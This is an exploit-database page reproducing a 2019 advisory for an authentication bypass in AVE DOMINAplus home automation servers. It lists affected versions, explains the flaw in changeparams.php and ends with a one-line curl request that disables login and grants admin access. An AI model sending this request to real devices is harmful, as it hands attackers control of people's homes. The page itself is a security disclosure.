header-logo
Suggest Exploit
vendor:
AVE DOMINAplus
by:
LiquidWorm
5.5
CVSS
MEDIUM
Authentication Bypass
287
CWE
Product Name: AVE DOMINAplus
Affected Version From: 1.10.x
Affected Version To: 1.10.x
Patch Exists: NO
Related CWE:
CPE: a:ave_s.p.a.:ave_dominaplus:1.10.x
Metasploit:
Other Scripts:
Platforms Tested:
2019

AVE DOMINAplus 1.10.x – Authentication Bypass

The AVE DOMINAplus version 1.10.x is vulnerable to an authentication bypass exploit. This vulnerability allows an attacker to bypass the authentication mechanism and gain unauthorized access to the system. The affected versions include Web Server Code 53AB-WBS - 1.10.62, Touch Screen Code TS01 - 1.0.65, Touch Screen Code TS03x-V | TS04X-V - 1.10.45a, and Touch Screen Code TS05 - 1.10.36. The exploit can be used on various models and versions of the AVE DOMINAplus system.

Mitigation:

The vendor has not provided any official mitigation for this vulnerability. However, users are advised to implement additional security measures such as strong passwords and network segmentation to minimize the risk of exploitation.
Source

Exploit-DB raw data:

# Exploit: AVE DOMINAplus 1.10.x - Authentication Bypass
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: AVE S.p.A.
# Product web page: https://www.ave.it | https://www.domoticaplus.it
# Affected version: Web Server Code 53AB-WBS - 1.10.62
# Advisory ID: ZSL-2019-5549
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5549.php

AVE DOMINAplus <=1.10.x Authentication Bypass Exploit


Vendor: AVE S.p.A.
Product web page: https://www.ave.it | https://www.domoticaplus.it
Affected version: Web Server Code 53AB-WBS - 1.10.62
                  Touch Screen Code TS01 - 1.0.65
                  Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
                  Touch Screen Code TS05 - 1.10.36
                  Models: 53AB-WBS
                          TS01
                          TS03V
                          TS04X-V
                          TS05N-V
                  App version: 1.10.77
                  App version: 1.10.65
                  App version: 1.10.64
                  App version: 1.10.62
                  App version: 1.10.60
                  App version: 1.10.52
                  App version: 1.10.52A
                  App version: 1.10.49
                  App version: 1.10.46
                  App version: 1.10.45
                  App version: 1.10.44
                  App version: 1.10.35
                  App version: 1.10.25
                  App version: 1.10.22
                  App version: 1.10.11
                  App version: 1.8.4
                  App version: TS1-1.0.65
                  App version: TS1-1.0.62
                  App version: TS1-1.0.44
                  App version: TS1-1.0.10
                  App version: TS1-1.0.9

Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
Designed to revolutionize your concept of living. DOMINA plus is the AVE home
automation proposal that makes houses safer, more welcoming and optimized. In
fact, our home automation system introduces cutting-edge technologies, designed
to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
and security and offers advanced supervision tools in order to learn how to
evaluate and reduce consumption through various solutions dedicated to energy
saving.

Desc: DOMINAplus suffers from an authentication bypass vulnerability due to missing
control check when directly calling the autologin GET parameter in changeparams.php
script. Setting the autologin value to 1 allows an unauthenticated attacker to
permanently disable the authentication security control and access the management
interface with admin privileges without providing credentials.

Tested on: GNU/Linux 4.1.19-armv7-x7
           GNU/Linux 3.8.13-bone50/bone71.1/bone86
           Apache/2.4.7 (Ubuntu)
           Apache/2.2.22 (Debian)
           PHP/5.5.9-1ubuntu4.23
           PHP/5.4.41-0+deb7u1
           PHP/5.4.36-0+deb7u3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5549
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5549.php


06.10.2019

--


#
# Mina... Mina, open your eyes!
#

$ curl -s http://192.168.1.10/changeparams.php?operazione=3&autologin=1
1

Navigation

Suggest Exploit

Services By CQR